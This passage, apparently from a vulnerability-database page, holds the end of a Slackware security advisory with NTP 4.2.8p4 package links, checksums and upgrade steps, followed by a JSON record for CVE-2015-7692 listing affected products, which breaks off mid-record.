Updated package for Slackware x86_64 13.1: ftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.1.txz
Updated package for Slackware 13.37: ftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p4-i486-1_slack13.37.txz
Updated package for Slackware x86_64 13.37: ftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.37.txz
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p4-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p4-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p4-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p4-x86_64-1.txz
MD5 signatures: +-------------+
Slackware 13.0 package: 21dd14178fea17a88c9326c8672ecefd ntp-4.2.8p4-i486-1_slack13.0.txz
Slackware x86_64 13.0 package: 8647479b2007b92ff8598184f2275263 ntp-4.2.8p4-x86_64-1_slack13.0.txz
Slackware 13.1 package: e0f122e8e271dc84db06202c03cc0288 ntp-4.2.8p4-i486-1_slack13.1.txz
Slackware x86_64 13.1 package: db0aff04b72b3d8c96ca8c8e1ed36c05 ntp-4.2.8p4-x86_64-1_slack13.1.txz
Slackware 13.37 package: 5914e43e886e5ff88fefd30083493e30 ntp-4.2.8p4-i486-1_slack13.37.txz
Slackware x86_64 13.37 package: 4335c3bf2ae24afc5ad734e8d80b3e94 ntp-4.2.8p4-x86_64-1_slack13.37.txz
Slackware 14.0 package: 39b05698797b638b67130e0b170e0a4b ntp-4.2.8p4-i486-1_slack14.0.txz
Slackware x86_64 14.0 package: dcf4a56ba1d013ee1c9d0e624e158709 ntp-4.2.8p4-x86_64-1_slack14.0.txz
Slackware 14.1 package: 1fd3a7beaf23303e2c211af377662614 ntp-4.2.8p4-i486-1_slack14.1.txz
Slackware x86_64 14.1 package: 438c3185aa8ec20d1c2b5e51786e4d41 ntp-4.2.8p4-x86_64-1_slack14.1.txz
Slackware -current package: 81bfb2fed450cb26a51b5e1cee0d33ed n/ntp-4.2.8p4-i586-1.txz
Slackware x86_64 -current package: 8bae4ad633af40d4d54b7686e4b225f9 n/ntp-4.2.8p4-x86_64-1.txz
Installation instructions: +------------------------+
Upgrade the package as root:
upgradepkg ntp-4.2.8p4-i486-1_slack14.1.txz
Then, restart the NTP daemon:
sh /etc/rc.d/rc.ntpd restart
+-----+
Slackware Linux Security Team http://slackware.com/gpg-key security@slackware.com
+------------------------------------------------------------------------+ | To leave the slackware-security mailing list: | +------------------------------------------------------------------------+ | Send an email to majordomo@slackware.com with this text in the body of | | the email message: | | | | unsubscribe slackware-security | | | | You will get a confirmation message back containing instructions to | | complete the process. Please do not reply to this email address
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-0212", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "ntp", "scope": "eq", "trust": 1.3, "vendor": "ntp", "version": "4.2.8" }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.3.0" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.2.8" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "7.0" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "oracle", "version": "6" }, { "model": "ntp", "scope": "gte", "trust": 1.0, "vendor": "ntp", "version": "4.2.0" }, { "model": "oncommand performance manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "oncommand unified manager", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "9.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.4" }, { "model": "linux", "scope": "eq", "trust": 1.0, "vendor": "debian", "version": "8.0" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "enterprise linux server", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "clustered data ontap", "scope": "eq", "trust": 1.0, "vendor": "netapp", "version": null }, { "model": "enterprise linux server aus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.3" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.5" }, { "model": "enterprise linux server tus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.7" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "6.0" }, { "model": "ntp", "scope": "lt", "trust": 1.0, "vendor": "ntp", "version": "4.3.77" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.0" }, { "model": "enterprise linux server eus", "scope": "eq", "trust": 1.0, "vendor": "redhat", "version": "7.6" }, { "model": "ntp", "scope": "eq", "trust": 0.9, "vendor": "ntp", "version": "4.3.70" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.3.x" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.3.77" }, { "model": "ntp", "scope": "eq", "trust": 0.8, "vendor": "ntp", "version": "4.2.8p4" }, { "model": "ntp", "scope": "lt", "trust": 0.8, "vendor": "ntp", "version": "4.2.x" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.67" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.74" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.68" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.69" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.72" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.73" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.75" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.76" }, { "model": "ntp", "scope": "eq", "trust": 0.6, "vendor": "ntp", "version": "4.3.71" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.16" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.13" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.9" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3.25" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.6" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.50" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.1" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.14.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.7.16" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.20" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.16" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.16" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.13" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "4.2.7p11", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "p153", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.12" }, { "model": "p7-rc2", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.5" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "ib6131 gb infiniband switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "83.4" }, { "model": "p150", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.4" }, { "model": "4.2.5p186", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.8" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.7" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "4.2.8p4", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "flex system en6131 40gb ethernet switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.75" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.3" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "4.2.5p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "junos os", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.126" }, { "model": "linux -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.7" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "automation stratix", "scope": "ne", "trust": 0.3, "vendor": "rockwell", "version": "590015.6.3" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "strm/jsa", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.00" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.5" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "flex system en6131 40gb ethernet switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.1000" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.8" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.37" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.12.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.15" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.0" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.10.1.37.00" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.5" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.2" }, { "model": "p8", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "ntpd", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "3.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.4" }, { "model": "4.2.8p3", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "4.2.7p111", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.4" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.11" }, { "model": "automation stratix", "scope": "eq", "trust": 0.3, "vendor": "rockwell", "version": "59000" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security privileged identity manager fixpack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2.0.28" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.68" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.6" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.11" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.10" }, { "model": "p74", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.8" }, { "model": "flex system en6131 40gb ethernet switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.26" }, { "model": "4.2.8p2", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.12" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "ib6131 gb infiniband switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "83.5.1000" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.10" }, { "model": "p1", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.2" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.14" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9.6" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.7.03.00" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3" }, { "model": "ntp", "scope": "ne", "trust": 0.3, "vendor": "ntp", "version": "4.3.77" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "p6", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.7" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.8.6" }, { "model": "4.2.7p366", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.11" }, { "model": "ib6131 gb infiniband switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "83.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.4" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.10" }, { "model": "p4", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "4.2.8p3-rc1", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.9" }, { "model": "p7", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "4.2.0.a", "scope": null, "trust": 0.3, "vendor": "ntp", "version": null }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.3" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.3" }, { "model": "linux x86 64", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "13.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "linux x86 64 -current", "scope": null, "trust": 0.3, "vendor": "slackware", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.4.0" }, { "model": "ntp", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.1.2" }, { "model": "p5", "scope": "eq", "trust": 0.3, "vendor": "ntp", "version": "4.2.4" }, { "model": "qlogic 8gb intelligent pass-thru module and san switch module", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.10" } ], "sources": [ { "db": "BID", "id": "77285" }, { "db": "JVNDB", "id": "JVNDB-2015-007697" }, { "db": "CNNVD", "id": "CNNVD-201510-588" }, { "db": "NVD", "id": "CVE-2015-7692" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, 